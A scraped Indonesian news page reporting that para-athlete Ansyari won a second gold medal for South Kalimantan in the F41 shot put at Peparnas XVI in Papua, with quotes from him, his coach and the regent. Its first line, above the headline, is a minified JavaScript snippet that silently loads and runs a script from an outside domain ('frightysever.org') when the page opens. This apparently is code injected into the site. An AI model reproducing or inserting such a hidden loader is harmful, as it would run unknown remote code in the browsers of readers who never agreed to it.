(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Ansyari Sumbang Dua Emas ke Kontingen Kalsel di Peparnas XVI Papua


KANALKALIMANTAN. COM, JAYAPURA – Mempersembahkan medali emas pertama bagi kontingen Kalimantan Selatan (Kalsel) dari cabang olahraga atletik, Ansyari kembali sukses sabet medali emas kedua ajang Pekan Paralimpik Nasional (Peparnas) XVI di Papua.

Torehan prestasi tersebut didapatnya saat bertanding di nomor tolak peluru klasifikasi F41 dengan mencatatkan jarak terjauh 8,17 meter.

Ansyari berhasil unggul dari paralimpian asal Jawa Tengah, Sholahuddin Al-ayyubi yang merebut medali perak dengan tolakan terjauh 7,36 meter saat bertanding di Komplek Stadion Lukas Enembe Sentani, Kabupaten Jayapura.

Sebelumnya pada nomor lempar lembing, Ansyari mempersembahkan medali emas, sehingga saat Ansyari sudah berhasil menyumbangkan 2 medali emas untuk Kalimantan Selatan.

 

 

Ansyari peraih medali emas cabor atletik Peparnas XVI Papua 2021. Foto: npchsu

Baca juga : Seorang Perempuan Penjual Miras Berurusan di Mapolsek Banjarbaru Barat

Ansyari mengaku keberhasilannya tersebut buah dari perjuangan keras selama latihan. Terlebih, menurut paralimpian asal Kabupaten HSU ini, motivasi dirinya untuk memberikan kebanggaan bagi kedua orangtua.

“Menang adalah target saya dan harus dapat juara. Saya persembahkan untuk orangtua saya yang sudah mendoakan dan mendukung,” katanya, saat dihubungi Kanalkalimantan.com, Senin (8/7/2021).

Ansyari sendiri tercatat sebagai warga Desa Gampa Raya, Kecamatan Sungai Tabukan, Kabupaten HSU ini, bisa dibilang baru satu tahun berkecimpung di olahraga. Dia langsung dibina serta dilatih oleh NPC HSU di bawah pelatih H Mulyadi SPd yang akhirnya bisa mengikuti berbagai lomba dan selalu berprestasi.

“Ansyari ini baru satu tahun bergabung, dan karena latihannya rutin dan terprogram, maka bisa berprestasi sekarang ini, meskipun pada saat pemusatan latihan saya tidak terlibat langsung, karena berada di Banjarbaru,” ujar Mulyadi, pendamping Ansyari selama di Papua.

 

Baca juga : Miliki 4 Paket Sabu, Pemuda 21 Tahun Diringkus di Depan ATM Kamaratih

Sementara itu, Bupati HSU H Abdul Wahid HK mengaku sangat bangga sekali atas prestasi yang diraih oleh Asnyari. Dia berharap dengan raihan medali emas ini bisa memotivasi atlet lain di Kabupaten HSU bisa berprestasi dan mengharumkan nama Kabupaten HSU baik di kancah provinsi maupun nasional.(kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Desy Arfianty

Recent Posts

Dua APILL Disiapkan, Atasi Kemacetan di Panglima Batur Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru menggelar ekspose pembangunan Area Traffic Control System (ATCS)… Read More

33 menit ago

Dua Bapaslon Jalur Non Partai Serahkan Syarat Dukungan ke KPU Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN – Detik-detik terakhir penutupan penyerahan syarat dukungan bakal pasangan calon (Bapaslon) Wali Kota… Read More

56 menit ago

Bupati Lepas TP PKK Banjar Wakil Kalsel ke Parade Budaya Nusantara

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur melepas peserta lomba Parade Budaya Nusantara, di… Read More

2 jam ago

Tak Ada Peminat Jalur Perseorangan di Pilwali Banjarbaru 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemilihan Wali Kota dan Wakil Wali Kota dalam kontestasi Pilkada 2024 di… Read More

3 jam ago

Kebakaran Dini Hari di Palangkaraya, Dana Hanya Bisa Selamatkan Anak Istri

KANALKALIMANTAN.COM, PALANGKARAYA - Puluhan rumah di permukiman padat penduduk Jalan Mendawai Induk, Kota Palangkaraya, Kalimantan… Read More

5 jam ago

Amuntai Expo dan Bazar UMKM 2024 Berakhir

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) melalui Asisten Perekonomian dan Pembangunan… Read More

6 jam ago

This website uses cookies.